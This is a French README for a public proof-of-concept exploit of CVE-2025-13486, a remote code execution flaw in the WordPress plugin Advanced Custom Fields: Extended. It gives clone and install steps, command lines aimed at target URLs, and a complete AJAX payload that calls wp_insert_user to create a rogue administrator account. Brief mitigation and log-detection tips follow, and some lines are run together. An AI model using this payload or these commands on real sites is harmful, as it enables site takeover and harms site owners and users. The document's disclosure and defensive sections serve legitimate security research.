
Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Création d'Admin
Preuve de concept de l'exploit pour CVE-2025-13486, une vulnérabilité critique dans le plugin WordPress Advanced Custom Fields: Extended (ACFE) qui permet une exécution de code à distance conduisant à une élévation de privilèges.
| Aspect | Détails |
|---|---|
| CVE ID | CVE-2025-13486 |
| Plugin | Advanced Custom Fields: Extended (ACFE) |
| Type | Exécution de code à distance → Élévation de privilèges |
| Niveau de risque | Critique |
| Versions affectées | Versions vulnérables d'ACFE (versions spécifiques à déterminer) |
| Score CVSS | 9.8 CRITIQUE |
| Date de découverte | 2025 |
| Auteur | 0xgh057r3c0n |
⚠️ AVERTISSEMENT : Cet outil est destiné UNIQUEMENT aux tests de sécurité autorisés et à des fins éducatives.
✅ Utilisation autorisée :
❌ Utilisation interdite :
L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Obtenez toujours une autorisation écrite appropriée avant de tester un système.
print_rwp_insert_userrequests# Cloner le dépôt
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# Installer les dépendances
pip install requests
# Alternative : installer depuis requirements.txt
pip install -r requirements.txt
# Rendre le script exécutable (Linux/Mac)
chmod +x exploit.py
Créez un fichier requirements.txt :
requests>=2.25.1
python3 exploit.py --url <TARGET_URL> [OPTIONS]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
L'exploit tire parti d'une gestion incorrecte des fonctions dans le point de terminaison acfe/form/render_form_ajax du plugin ACFE, permettant aux attaquants d'appeler des fonctions PHP arbitraires.
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));
// Exploit payload structure
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits
/wp-admin/admin-ajax.phpaction=acfe/form/render_form_ajaxwp_insert_user via AJAX# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am 'Add new feature')git push origin feature/improvement)Veuillez signaler les bogues et problèmes via :
CVE-2025-13486/
├── exploit.py # Script d'exploit principal
├── README.md # Cette documentation
├── requirements.txt # Dépendances Python
├── LICENSE # Fichier de licence MIT
├── examples/ # Exemples d'utilisation
│ ├── verification.txt
│ └── exploitation.txt
└── tests/ # Scripts de test
├── test_verify.py
└── test_exploit.py
0xgh057r3c0n - Chercheur en sécurité
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Construit avec ❤️ pour la communauté de la sécurité
⚠️ Utilisez de manière responsable et éthique ⚠️
| Option | Description | Requis | Par défaut |
|---|
-u, --url | URL WordPress cible | Oui | - |
--verify | Vérifier uniquement, sans exploitation | Non | Faux |
--user | Nom d'utilisateur personnalisé pour l'admin | Non | admin_XXXXX |
--password | Mot de passe personnalisé pour l'admin | Non | 12 caractères aléatoires |
--email | Email personnalisé pour l'admin | Non | [email protected] |